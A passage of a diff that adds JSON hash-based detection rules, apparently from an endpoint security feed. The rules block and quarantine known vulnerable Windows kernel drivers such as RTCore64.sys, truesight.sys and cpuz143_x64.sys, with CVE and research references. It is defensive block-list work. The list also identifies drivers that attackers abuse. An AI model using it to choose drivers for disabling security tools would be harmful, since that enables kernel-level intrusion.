+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604742Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "220a2dcf4d597f9208c0e7fd7057a91e88e118d420f20aac8e75ae3e39a7ac22",
+ "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0be91fa1-80df-5fcd-bc4c-98dfd1c72bdb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983755Z",
+ "creation_date": "2026-03-23T11:45:29.983757Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983762Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3a5ec83fe670e5e23aef3afa0a7241053f5b6be5e6ca01766d6b5f9177183c25",
+ "comment": "Vulnerable Kernel Driver (aka GLCKIO2.sys) [https://www.loldrivers.io/drivers/52ded752-2708-499e-8f37-98e4a9adc23c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0bf30aba-72dc-5acc-a9ee-982a4c02db63",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.457861Z",
+ "creation_date": "2026-03-23T11:45:30.457864Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.457885Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a495ffa623a5220179b0dd519935e255dd6910b7b7bc3d68906528496561ff53",
+ "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0bf87bc2-faab-5c3d-aaea-376393799767",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154553Z",
+ "creation_date": "2026-03-23T11:45:31.154555Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154560Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "47e207fced7565ccf0f6c03359babd671b65b67c336ae642f37c60bc363aa0ce",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0bfa33b5-746c-5e84-afd7-857dbaa86431",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.494053Z",
+ "creation_date": "2026-03-23T11:45:31.494057Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.494066Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a3837e6bb4c2d6083895ba1a7df22bd8241b346a1e726b51b99e8d7e8ddd7cd8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0bfd4c23-9c36-5728-a55a-8ba59d5ea79b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616023Z",
+ "creation_date": "2026-03-23T11:45:29.616026Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616032Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c4031eb0a40137c4ab6d2dbdd2755135c63ab137a0aeb74a7bbea6617b96f0a7",
+ "comment": "TOSHIBA BIOs update vulnerable driver (aka NCHGBIOS2x64.SYS) [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0c01846a-3edd-546e-aa57-7fecce8e3ccb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.824269Z",
+ "creation_date": "2026-03-23T11:45:31.824272Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.824280Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c42e2c89f5c6a0cb91903b2549f4a5aa109f732679db26c6b247ca7075fba144",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0c035560-db45-5491-803c-c84398f94958",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.809081Z",
+ "creation_date": "2026-03-23T11:45:31.809083Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.809089Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1272c192e229d867f524ee124a91ec81a472944f732aaf3d85ee8c6adafb2d90",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0c078c97-2f90-5ded-89dc-e2a9e8725877",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.460956Z",
+ "creation_date": "2026-03-23T11:45:30.460959Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.460968Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7fc01f25c4c18a6c539cda38fdbf34b2ff02a15ffd1d93a7215e1f48f76fb3be",
+ "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0c0f8d5c-8ef9-5233-b4f5-2a1f371a09f5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817232Z",
+ "creation_date": "2026-03-23T11:45:30.817234Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817240Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "49ae47b6b4d5e1b791b89e0395659d42a29a79c3e6ec52cbfcb9f9cef857a9dd",
+ "comment": "Vulnerable Kernel Driver (aka AODDriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0c10ce36-7342-5a8e-869b-015fa2183743",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.822291Z",
+ "creation_date": "2026-03-23T11:45:31.822293Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.822298Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "88cf314dbfc8b2b83f07cd8c381b9f2761b6a229392cca33a4104ce8973d204b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0c1de15c-e502-57a7-a78b-a4536695b801",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611515Z",
+ "creation_date": "2026-03-23T11:45:29.611517Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611522Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "94f39e23194d01698b2d8e7bb1c212bf192e81df59766d4adf5f7e33bbe13181",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0c24fe95-5f55-5133-8f41-ced83456dcc0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.478943Z",
+ "creation_date": "2026-03-23T11:45:31.478955Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.478965Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "963bf7142b9023687b95016e5a182a114acb16ed9860c1b4d3f5865226671805",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0c436b7c-deb5-5a7e-9800-4692b4497446",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.149033Z",
+ "creation_date": "2026-03-23T11:45:31.149036Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.149045Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bf943d2b77401c33550d46acc310c044eb8194332cb8c7ed07999ba8a02b9929",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0c4672ee-de17-5b12-a783-addd9ac07e7f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.821023Z",
+ "creation_date": "2026-03-23T11:45:31.821026Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.821035Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7c27b79d4c1da8295b19c8375ca80875206d516010ff4112bdf30ae14763f84e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0c4d7fa4-db63-5a10-8970-9ffa11c9b446",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817533Z",
+ "creation_date": "2026-03-23T11:45:31.817535Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817541Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6a0775d18fc9a3b24793b0f9d38a5dfc247efaad75bd335c4e543b4f55ba16ac",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0c53e645-593e-540d-8075-22c161acbb57",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.609902Z",
+ "creation_date": "2026-03-23T11:45:29.609904Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.609910Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7b68763c39b45534854ec382434fd5a9640942c1f7393857af642ee327d4c570",
+ "comment": "Novell vulnerable driver (aka nicm.sys, nscm.sys and ncpl.sys) [CVE-2013-3956] [https://www.loldrivers.io/drivers/f4126206-564f-49f5-a942-2138a3131e0e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0c56d84b-293a-5505-a48d-9bf14fd51663",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828578Z",
+ "creation_date": "2026-03-23T11:45:30.828580Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828585Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "71724e2bd0c52ee13f77557b68cd7a8a4bc3d345bf0d6aa9653cc2102c8d10ec",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0c5dba18-ed87-59d8-a37e-48202e9c6c1b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607918Z",
+ "creation_date": "2026-03-23T11:45:29.607920Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607925Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "53eaefba7e7dca9ab74e385abf18762f9f1aa51594e7f7db5ba612d6c787dd7e",
+ "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0c5dfaa5-bc6f-5bc1-8f1d-59e2c7afa09e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.461353Z",
+ "creation_date": "2026-03-23T11:45:30.461356Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.461365Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8f8956abdeb2a52be2cc514790a737a0ad39a9e698a77c1f358e77f1bf9f180b",
+ "comment": "Vulnerable Kernel Driver (aka sfdrvx64.sys) [https://www.loldrivers.io/drivers/5a03dc5a-115d-4d6f-b5b5-685f4c014a69/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0c622c91-3e05-5868-8ffd-17da64ea8a0e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827291Z",
+ "creation_date": "2026-03-23T11:45:30.827293Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827299Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dd502981546c9a28914b3a786172c5bd3945c1995dd4c34f251cb0d1d2ddc97e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0c6ada67-55fc-550d-b7b1-782a5b1b72c6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817169Z",
+ "creation_date": "2026-03-23T11:45:31.817171Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817177Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "72b6c0305d2d264b0acf9caed51a831ca3916c958ede5c32018410a550376d8a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0c6f8bc1-d255-5994-a459-a74a81a0e8b4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488793Z",
+ "creation_date": "2026-03-23T11:45:31.488795Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488801Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3c06c78644bb55d97c74a4763c8f4889928b0e149877369b1bf8d801a660694d",
